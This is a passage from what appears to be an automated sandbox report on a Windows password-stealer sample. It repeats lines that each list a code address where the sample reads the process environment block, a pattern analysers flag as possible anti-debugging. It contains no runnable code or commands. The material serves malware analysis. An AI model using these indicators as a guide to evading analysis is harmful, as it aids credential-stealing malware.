          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B8E4 mov eax, dword ptr fs:[00000030h]10_2_0180B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B8E4 mov eax, dword ptr fs:[00000030h]10_2_0180B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6800 mov eax, dword ptr fs:[00000030h]10_2_017E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6800 mov eax, dword ptr fs:[00000030h]10_2_017E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6800 mov eax, dword ptr fs:[00000030h]10_2_017E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28FD mov eax, dword ptr fs:[00000030h]10_2_017F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28FD mov eax, dword ptr fs:[00000030h]10_2_017F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28FD mov eax, dword ptr fs:[00000030h]10_2_017F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867016 mov eax, dword ptr fs:[00000030h]10_2_01867016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867016 mov eax, dword ptr fs:[00000030h]10_2_01867016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867016 mov eax, dword ptr fs:[00000030h]10_2_01867016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E58EC mov eax, dword ptr fs:[00000030h]10_2_017E58EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B4015 mov eax, dword ptr fs:[00000030h]10_2_018B4015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B4015 mov eax, dword ptr fs:[00000030h]10_2_018B4015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E40E1 mov eax, dword ptr fs:[00000030h]10_2_017E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E40E1 mov eax, dword ptr fs:[00000030h]10_2_017E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E40E1 mov eax, dword ptr fs:[00000030h]10_2_017E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814020 mov edi, dword ptr fs:[00000030h]10_2_01814020
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E70C0 mov eax, dword ptr fs:[00000030h]10_2_017E70C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E70C0 mov eax, dword ptr fs:[00000030h]10_2_017E70C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1843 mov eax, dword ptr fs:[00000030h]10_2_018A1843
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01800050 mov eax, dword ptr fs:[00000030h]10_2_01800050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01800050 mov eax, dword ptr fs:[00000030h]10_2_01800050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov ecx, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180F86D mov eax, dword ptr fs:[00000030h]10_2_0180F86D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2073 mov eax, dword ptr fs:[00000030h]10_2_018A2073
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9080 mov eax, dword ptr fs:[00000030h]10_2_017E9080
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E3880 mov eax, dword ptr fs:[00000030h]10_2_017E3880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E3880 mov eax, dword ptr fs:[00000030h]10_2_017E3880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B1074 mov eax, dword ptr fs:[00000030h]10_2_018B1074
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A138A mov eax, dword ptr fs:[00000030h]10_2_018A138A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov ecx, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov eax, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov eax, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov eax, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0189D380 mov ecx, dword ptr fs:[00000030h]10_2_0189D380
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181138B mov eax, dword ptr fs:[00000030h]10_2_0181138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181138B mov eax, dword ptr fs:[00000030h]10_2_0181138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181138B mov eax, dword ptr fs:[00000030h]10_2_0181138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FF370 mov eax, dword ptr fs:[00000030h]10_2_017FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FF370 mov eax, dword ptr fs:[00000030h]10_2_017FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FF370 mov eax, dword ptr fs:[00000030h]10_2_017FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181B390 mov eax, dword ptr fs:[00000030h]10_2_0181B390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812397 mov eax, dword ptr fs:[00000030h]10_2_01812397
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180EB9A mov eax, dword ptr fs:[00000030h]10_2_0180EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180EB9A mov eax, dword ptr fs:[00000030h]10_2_0180EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EDB60 mov ecx, dword ptr fs:[00000030h]10_2_017EDB60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1BA8 mov eax, dword ptr fs:[00000030h]10_2_018A1BA8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EF358 mov eax, dword ptr fs:[00000030h]10_2_017EF358
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814BAD mov eax, dword ptr fs:[00000030h]10_2_01814BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814BAD mov eax, dword ptr fs:[00000030h]10_2_01814BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814BAD mov eax, dword ptr fs:[00000030h]10_2_01814BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B5BA5 mov eax, dword ptr fs:[00000030h]10_2_018B5BA5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B9BBE mov eax, dword ptr fs:[00000030h]10_2_018B9BBE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8BB6 mov eax, dword ptr fs:[00000030h]10_2_018B8BB6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EDB40 mov eax, dword ptr fs:[00000030h]10_2_017EDB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018153C5 mov eax, dword ptr fs:[00000030h]10_2_018153C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018653CA mov eax, dword ptr fs:[00000030h]10_2_018653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018653CA mov eax, dword ptr fs:[00000030h]10_2_018653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180DBE9 mov eax, dword ptr fs:[00000030h]10_2_0180DBE9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018923E3 mov ecx, dword ptr fs:[00000030h]10_2_018923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018923E3 mov ecx, dword ptr fs:[00000030h]10_2_018923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018923E3 mov eax, dword ptr fs:[00000030h]10_2_018923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A131B mov eax, dword ptr fs:[00000030h]10_2_018A131B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E1BE9 mov eax, dword ptr fs:[00000030h]10_2_017E1BE9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8B58 mov eax, dword ptr fs:[00000030h]10_2_018B8B58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01876365 mov eax, dword ptr fs:[00000030h]10_2_01876365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01876365 mov eax, dword ptr fs:[00000030h]10_2_01876365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01876365 mov eax, dword ptr fs:[00000030h]10_2_01876365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4B94 mov edi, dword ptr fs:[00000030h]10_2_017E4B94
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F1B8F mov eax, dword ptr fs:[00000030h]10_2_017F1B8F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F1B8F mov eax, dword ptr fs:[00000030h]10_2_017F1B8F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B7A mov eax, dword ptr fs:[00000030h]10_2_01813B7A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B7A mov eax, dword ptr fs:[00000030h]10_2_01813B7A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181DA88 mov eax, dword ptr fs:[00000030h]10_2_0181DA88
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181DA88 mov eax, dword ptr fs:[00000030h]10_2_0181DA88
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A129A mov eax, dword ptr fs:[00000030h]10_2_018A129A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181D294 mov eax, dword ptr fs:[00000030h]10_2_0181D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181D294 mov eax, dword ptr fs:[00000030h]10_2_0181D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01815AA0 mov eax, dword ptr fs:[00000030h]10_2_01815AA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01815AA0 mov eax, dword ptr fs:[00000030h]10_2_01815AA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181FAB0 mov eax, dword ptr fs:[00000030h]10_2_0181FAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018112BD mov esi, dword ptr fs:[00000030h]10_2_018112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018112BD mov eax, dword ptr fs:[00000030h]10_2_018112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018112BD mov eax, dword ptr fs:[00000030h]10_2_018112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E8239 mov eax, dword ptr fs:[00000030h]10_2_017E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E8239 mov eax, dword ptr fs:[00000030h]10_2_017E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E8239 mov eax, dword ptr fs:[00000030h]10_2_017E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812ACB mov eax, dword ptr fs:[00000030h]10_2_01812ACB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8ADD mov eax, dword ptr fs:[00000030h]10_2_018B8ADD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4A20 mov eax, dword ptr fs:[00000030h]10_2_017E4A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4A20 mov eax, dword ptr fs:[00000030h]10_2_017E4A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812AE4 mov eax, dword ptr fs:[00000030h]10_2_01812AE4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EAA16 mov eax, dword ptr fs:[00000030h]10_2_017EAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EAA16 mov eax, dword ptr fs:[00000030h]10_2_017EAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov eax, dword ptr fs:[00000030h]10_2_017E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov ecx, dword ptr fs:[00000030h]10_2_017E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov eax, dword ptr fs:[00000030h]10_2_017E5210
